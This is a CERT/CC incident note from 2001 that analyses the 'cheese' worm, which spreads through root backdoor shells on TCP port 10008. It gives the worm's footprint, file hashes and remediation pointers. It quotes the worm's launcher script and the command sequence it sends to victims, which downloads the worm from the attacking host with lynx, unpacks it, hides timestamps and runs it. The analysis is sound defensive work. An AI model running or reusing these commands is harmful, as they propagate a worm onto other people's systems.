The CERT Coordination Center publishes incident notes to provide information about incidents to the Internet community. <h2>The "cheese" Worm</h2> Date: Thursday, May 17, 2001<p> <h3>Overview</h3> The CERT/CC has observed in public and private reports a recent pattern of activity surrounding probes to TCP port 10008. We have obtained an artifact called the 'cheese worm' which may contribute to the pattern. <h3>Description</h3> <p> The 'cheese worm' is a worm designed to remove all inetd services referencing '/bin/sh' from systems with root shells listening on TCP port 10008. In reality, the 'cheese worm' will attempt to execute a series of shell commands on any host which accepts TCP connections on TCP port 10008. <p> The 'cheese worm' perpetuates its attack cycle across multiple hosts by copying itself from attacking host to victim host and self-initiating another attack cycle. Thus, no human intervention is required to perpetuate the cycle once the worm has begun to propagate. <p> <b>Contents:</b> <p> <font face="Courier New"> <pre> MD5 Checksum Filesize Filename ------------------------------------------------------- c6a0feb1b1723493fe504148df4fc0af 2381 cheese a87a2a8c31cfe38af309e173c2257158 47 go 0093fdcb12b6fb836495b7cd53d19ddb 15471 psm </pre> </font> <p> <b>Attack Sequence:</b> <p> In examples we have seen, the contents of the 'cheese worm' are installed in '/tmp/.cheese' and that directory is the working directory as commands are executed. <p> The attack sequence is initiated with the execution of the shell script 'go' on the attacking host. 'go' simply executes the perl script 'cheese': <p> <font face="Courier New"> <pre> /tmp/.cheese/go: #!/bin/sh nohup ./cheese $1 1>/dev/null 2>&1 & </pre> </font> <p> The 'cheese' script does the following: <p> <ul> <li>changes its process name to 'httpd'</li><p> <li>deletes the 'go' script</li><p> <li>checks for a file named 'ADL' in the working directory</li><p> <ul> <li>if found, 'cheese' exits</li><p> <li>if not found, the 'ADL' file is created, the string 'ADL' is written into the file, and the timestamp is set to match the timestamp of the system's '/bin/ls' file</li><p> </p></p></ul> <li>reads '/etc/inetd.conf' and rewrites it excluding any line that contains the string '/bin/sh'</li><p> <li>attempts to restart inetd twice, once using '/usr/bin/killall' and once using '/bin/killall'</li><p> <li>until the 'cheese' process is somehow killed, it repeats a cycle of scanning semi-random /16 (e.g., class B) network blocks for hosts listening on TCP port 10008 using the 'psm' program.</li> <ul><p> <li>the first octet of the address may be from 193 to 218</li> <li>the second octet of the address may be from 1 to 254</li> </p></ul><p> On hosts responding to a probe on TCP port 10008, the worm<p> <ul> <li>establishes a TCP connection to port 10008 of the victim host</li><p> <li>starts a listener process on a random TCP socket number from 10000 through 15000</li> <ul> <li>the listener process will send a copy of '/tmp/.cheese/cheese.uue' to anything that provides two linefeeds after connecting to it's TCP socket</li><p> </p></ul> <li>sends the following commands to the victim host on TCP port 10008 (word wrapped for readability)</li><p> <font face="Courier New"> <dl> <dd>export TERM=vt100 ; </dd> <dd>export PATH=\"/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin\" ; </dd> <dd>export HISTFILE=/dev/null ; </dd> <dd>mkdir /tmp/.cheese ; </dd> <dd>touch -r /bin/sh /tmp/.cheese ; </dd> <dd>cd /tmp/.cheese ; </dd> <dd>lynx -source http://$li:$rp/ >cheese.uue ; </dd> <dd>uudecode cheese.uue ; </dd> <dd>tar zxvf cheese.tgz ; </dd> <dd>rm -f cheese.tgz ; </dd> <dd>touch -r /bin/sh * ; </dd> <dd>chmod 755 * ; </dd> <dd>./go $mhih ; </dd> <dd>exit ;</dd> </dl> </font> <ul><p> <li>'$li' contains the IP address of the local system</li> <li>'$rp' is the TCP port on the local system for the listener</li> <li>'$mhih' is the IP address of the victim host</li> </p></ul><p> <dl> If successfully executed on the victim host, these commands cause a copy of the 'cheese worm' (e.g., cheese.uue) to be downloaded, installed, and executed on the victim host.<p> </p></dl> <li>terminates the listener process</li> </p></p></p></ul> </p></p></p></p></p></p></p></ul> <h3>Impact</h3> <p> <b>Network Footprint:</b> <p> A host running an active instance of the 'cheese worm' will <p> <ul> <li>scan TCP port 10008 on remote /16 network blocks</li> <li>initiate TCP connections to TCP port 10008 on victim hosts</li> <li>receive a TCP connection on a TCP port number from 10000 through 15000 when the worm replicates to a victim host</li> </ul> <p> A victim host being compromised by the 'cheese worm' will <p> <ul> <li>receive a probe to TCP port 10008 from the attacking host</li> <li>receive a TCP connection to port 10008 from the attacking host</li> <li>initiate a TCP connection to a TCP port number from 10000 to 15000 on the attacking host</li> <li>begin the attack cycle of an active 'cheese worm' host</li> </ul> <p> <b>System Footprint:</b> <p> The following files may be found on a system impacted by the 'cheese worm': <dl> <dd>/tmp/.cheese/</dd> <dd>/tmp/.cheese/ADL</dd> <dd>/tmp/.cheese/go</dd> <dd>/tmp/.cheese/cheese</dd> <dd>/tmp/.cheese/psm</dd> <dd>/tmp/.cheese/cheese.uue</dd> <dd>/tmp/.cheese/cheese.tgz</dd> </dl> <p> The following files may be modified: <p> <dl> <dd>/etc/inetd.conf </dd></dl> <p> The following services may be restarted: <p> <dl> <dd>inetd</dd> </dl> <p> The 'cheese worm' relies on an exposed, unauthenticated, privileged shell listening on TCP port 10008 to alter a system and perpetuate its attack cycle. As such, the presence of the 'cheese worm' on a system implies an insecure system configuration or a previous system compromise. <h3>Solutions</h3> <p> The CERT/CC encourages sites to review hosts infected with the 'cheese worm' for other signs of intrusion and take appropriate steps to insure the security of impacted systems. <p> In particular, certain versions of the BIND TSIG exploit discussed in <p> <dl> <dd><a href="/incident_notes/IN-2001-03.html">IN-2001-03</a>, Exploitation of BIND Vulnerabilities</dd> </dl> <p> create a backdoor root shell on TCP port 10008. Such an exploit was bundled into at least one version of the '1i0n' worm. A detailed analysis of the '1i0n' worm was published by Max Vision and is available at <p> <dl> <dd><a href="http://www.whitehats.com/library/worms/lion/index.html"> http://www.whitehats.com/library/worms/lion/index.html</a></dd> </dl> <p> The <a href="http://certcc.or.kr/">Korea Computer Emergency Response Team Coordination Center (CERTCC-KR)</a> has published <a href="http://www.certcc.or.kr/paper/incident_note/2001/in2001_007.html"> CERTCC-KR-IN-01-007</a> discussing the 'cheese' worm in Korean. </p> <p> If you believe a host under your control has been compromised, you may wish to refer to </p> <p> <dl> <dd><a href="/tech_tips/root_compromise.html">Steps for Recovering From a Root Compromise</a></dd> </dl> </p> <h3>Acknowledgement</h3> The CERT/CC thanks <a href="http://www.certcc.or.kr/">CERTCC-KR</a> for their contributions to this Incident Note. <p> <b>Author</b>: <a href="mailto:cert@cert.org?subject=IN-2001-05%20Feedback">Kevin Houle</a><br/> </p> <!--#include virtual="/include/footer_nocopyright.html" --> <p>Copyright 2001 Carnegie Mellon University.</p> </p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p> |